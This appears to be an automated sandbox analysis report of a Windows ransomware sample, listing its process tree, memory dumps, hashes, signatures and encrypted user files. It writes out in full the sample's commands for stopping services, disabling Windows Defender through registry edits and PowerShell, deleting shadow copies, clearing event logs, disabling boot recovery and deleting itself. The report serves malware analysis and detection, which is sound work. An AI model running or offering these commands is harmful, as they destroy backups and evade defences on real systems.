PID 844 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 1452 wrote to memory of 760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1452 wrote to memory of 760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1452 wrote to memory of 760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 844 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 428 wrote to memory of 1060 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 428 wrote to memory of 1060 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 428 wrote to memory of 1060 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 844 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 592 wrote to memory of 1596 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 592 wrote to memory of 1596 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 592 wrote to memory of 1596 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 1836 wrote to memory of 432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1836 wrote to memory of 432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1836 wrote to memory of 432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 1804 wrote to memory of 1876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 1876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 1040 wrote to memory of 1504 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1040 wrote to memory of 1504 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1040 wrote to memory of 1504 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 1568 wrote to memory of 952 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1568 wrote to memory of 952 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1568 wrote to memory of 952 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 844 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 844 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\net.exe
PID 1776 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1776 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1776 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 844 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe
PID 844 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe

"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"

Network

N/A

Files

memory/1452-54-0x0000000000000000-mapping.dmp

memory/760-55-0x0000000000000000-mapping.dmp

memory/428-56-0x0000000000000000-mapping.dmp

memory/1060-57-0x0000000000000000-mapping.dmp

memory/592-58-0x0000000000000000-mapping.dmp

memory/1596-59-0x0000000000000000-mapping.dmp

memory/1836-60-0x0000000000000000-mapping.dmp

memory/432-61-0x0000000000000000-mapping.dmp

memory/1804-62-0x0000000000000000-mapping.dmp

memory/1876-63-0x0000000000000000-mapping.dmp

memory/1040-64-0x0000000000000000-mapping.dmp

memory/1504-65-0x0000000000000000-mapping.dmp

memory/1568-66-0x0000000000000000-mapping.dmp

memory/952-67-0x0000000000000000-mapping.dmp

memory/1776-68-0x0000000000000000-mapping.dmp

memory/1624-69-0x0000000000000000-mapping.dmp

memory/968-70-0x0000000000000000-mapping.dmp

memory/1288-71-0x0000000000000000-mapping.dmp

memory/1752-72-0x0000000000000000-mapping.dmp

memory/1732-73-0x0000000000000000-mapping.dmp

memory/1276-74-0x0000000000000000-mapping.dmp

memory/2028-75-0x0000000000000000-mapping.dmp

memory/1564-76-0x0000000000000000-mapping.dmp

memory/1924-77-0x0000000000000000-mapping.dmp

memory/1708-78-0x0000000000000000-mapping.dmp

memory/268-79-0x0000000000000000-mapping.dmp

memory/1036-80-0x0000000000000000-mapping.dmp

memory/564-81-0x0000000000000000-mapping.dmp

memory/1596-82-0x0000000000000000-mapping.dmp

memory/808-83-0x0000000000000000-mapping.dmp

memory/1168-84-0x0000000000000000-mapping.dmp

memory/660-85-0x0000000000000000-mapping.dmp

memory/1152-86-0x0000000000000000-mapping.dmp

memory/1524-87-0x0000000000000000-mapping.dmp

memory/1392-88-0x0000000000000000-mapping.dmp

memory/1620-89-0x0000000000000000-mapping.dmp

memory/560-90-0x0000000000000000-mapping.dmp

memory/1244-91-0x0000000000000000-mapping.dmp

memory/912-92-0x0000000000000000-mapping.dmp

memory/1044-93-0x0000000000000000-mapping.dmp

memory/888-94-0x0000000000000000-mapping.dmp

memory/884-95-0x0000000000000000-mapping.dmp

memory/1616-96-0x0000000000000000-mapping.dmp

memory/1824-97-0x0000000000000000-mapping.dmp

memory/1852-98-0x0000000000000000-mapping.dmp

memory/1320-99-0x0000000000000000-mapping.dmp

memory/612-100-0x0000000000000000-mapping.dmp

memory/2000-101-0x0000000000000000-mapping.dmp

memory/1696-102-0x0000000000000000-mapping.dmp

memory/924-103-0x0000000000000000-mapping.dmp

memory/1744-104-0x0000000000000000-mapping.dmp

memory/1612-105-0x0000000000000000-mapping.dmp

memory/760-106-0x0000000000000000-mapping.dmp

memory/744-107-0x0000000000000000-mapping.dmp

memory/1816-108-0x0000000000000000-mapping.dmp

memory/1504-109-0x0000000000000000-mapping.dmp

memory/1872-110-0x0000000000000000-mapping.dmp

memory/540-111-0x0000000000000000-mapping.dmp

memory/1760-112-0x0000000000000000-mapping.dmp

memory/1760-113-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp

memory/1060-114-0x0000000000000000-mapping.dmp

memory/1928-116-0x0000000000000000-mapping.dmp

memory/1748-118-0x0000000000000000-mapping.dmp

memory/812-119-0x0000000000000000-mapping.dmp

memory/1920-120-0x0000000000000000-mapping.dmp

memory/1868-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp

memory/1868-124-0x0000000002412000-0x0000000002414000-memory.dmp

memory/1868-126-0x000000000241B000-0x000000000243A000-memory.dmp

memory/1868-125-0x0000000002414000-0x0000000002417000-memory.dmp

memory/1868-123-0x0000000002410000-0x0000000002412000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b8e610b2334f1c528aa7ec5b8c07f1e4
SHA1 3583b173c98b14b9fc18c798cecd94fd9889fb31
SHA256 187b9e01b982fce924b1c7182002c48cd192205e7b2c2d86ea9c11264bee1792
SHA512 743f07cd92debbcbee136af8b2e6e2921e89d6ccd10884a89417448cb378777b086632c6ddab05d02920f7ca9845c86163af0eded72afc8a66bcf1fa887e8494

memory/2136-129-0x000007FEF2610000-0x000007FEF316D000-memory.dmp

memory/2136-130-0x000000001B7C0000-0x000000001BABF000-memory.dmp

memory/2136-133-0x0000000002804000-0x0000000002807000-memory.dmp

memory/2136-132-0x0000000002802000-0x0000000002804000-memory.dmp

memory/2136-131-0x0000000002800000-0x0000000002802000-memory.dmp

memory/2136-134-0x000000000280B000-0x000000000282A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 19:26

Reported

2022-01-12 19:31

Platform

win10-en-20211208

Max time kernel

186s

Max time network

224s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\CompareSkip.tif => C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\MoveComplete.png => C:\Users\Admin\Pictures\MoveComplete.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mjJ5vmBhLmg0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\RegisterUnlock.png => C:\Users\Admin\Pictures\RegisterUnlock.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_g4LpNxXGly00.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\RegisterUnlock.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_g4LpNxXGly00.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\DenyRename.crw => C:\Users\Admin\Pictures\DenyRename.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mmup_e1pz7A0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\DenyRename.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mmup_e1pz7A0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\OpenCompress.tiff => C:\Users\Admin\Pictures\OpenCompress.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_7hO2a7hMKL80.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\SubmitOpen.png => C:\Users\Admin\Pictures\SubmitOpen.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_zJEq2wjIOyY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\WaitOut.crw => C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\MoveComplete.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mjJ5vmBhLmg0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\OpenCompress.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_7hO2a7hMKL80.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File renamed C:\Users\Admin\Pictures\RevokeRestore.tiff => C:\Users\Admin\Pictures\RevokeRestore.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Ael394oL5ZY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Users\Admin\Pictures\RevokeRestore.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Ael394oL5ZY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
